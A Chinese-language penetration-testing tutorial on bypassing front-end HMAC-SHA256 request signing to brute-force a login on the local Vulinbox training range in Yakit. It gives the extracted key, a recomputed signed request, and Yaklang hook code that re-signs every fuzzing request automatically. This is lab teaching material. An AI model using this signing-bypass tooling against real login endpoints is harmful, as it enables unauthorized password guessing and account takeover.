渗透测试-前端验签绕过之SHA256

本文是高级前端加解密与验签实战的第1篇文章，本系列文章实验靶场为Yakit里自带的Vulinbox靶场，本文讲述的是绕过SHA256签名来爆破登录。

绕过

通过查看源代码可以看到key为

1234123412341234 

通过查看源代码可以看到是通过SHA256来进行签名的，他把请求体的username和password字段提取，然后进行加密。

username=admin&password=admin123 

使用CyberChef加密，最终得到加密值为：fc4b936199576dd7671db23b71100b739026ca9dcb3ae78660c4ba3445d0654d

可以看到自己计算和前端计算的一致：

修改密码，重新构造签名：

username=admin&password=666666 => 26976ad249c29595c3e9e368d9c3bc772b5a27291515caddd023d69421b7ffee 

发送请求，可以看到验签成功，密码正确登陆成功，自此签名绕过成功。

POST /crypto/sign/hmac/sha256/verify HTTP/1.1 Host: 127.0.0.1:8787 Content-Type: application/json  {   "signature": "26976ad249c29595c3e9e368d9c3bc772b5a27291515caddd023d69421b7ffee",   "key": "31323334313233343132333431323334",   "username": "admin",   "password": "666666" } 

热加载

这是我写的热加载代码，通过beforeRequest劫持请求包，使用encryptData函数进行加密，最终实现热加载自动签名功能。

encryptData = (packet) => {     body = poc.GetHTTPPacketBody(packet)     params = json.loads(body)     //获取账号和密码     name = params.username     pass  = params.password     key = "31323334313233343132333431323334"    //十六进制密钥      //HmacSha256加密     signText = f`username=${name}&password=${pass}`     sign = codec.EncodeToHex(codec.HmacSha256(f`${codec.DecodeHex(key)~}`, signText))      //构造请求体     result = f`{"username":"${name}","password":"${pass}","signature":"${sign}","key":"${key}"}`      return string(poc.ReplaceBody(packet, result, false)) }  //发送到服务端修改数据包 // beforeRequest = func(req){ //     return encryptData(req) // }  //调试用 packet = <<<TEXT POST /crypto/sign/hmac/sha256/verify HTTP/1.1 Host: 127.0.0.1:8787 Content-Type: application/json Content-Length: 179  {"username":"admin","password":"admin123"} TEXT result = (encryptData(packet)) print(result) 

调试结果如下：

把beforeRequest取消注释，添加到Web Fuzzer模块的热加载中：

保存后发送请求，热加载成功实现自动签名功能。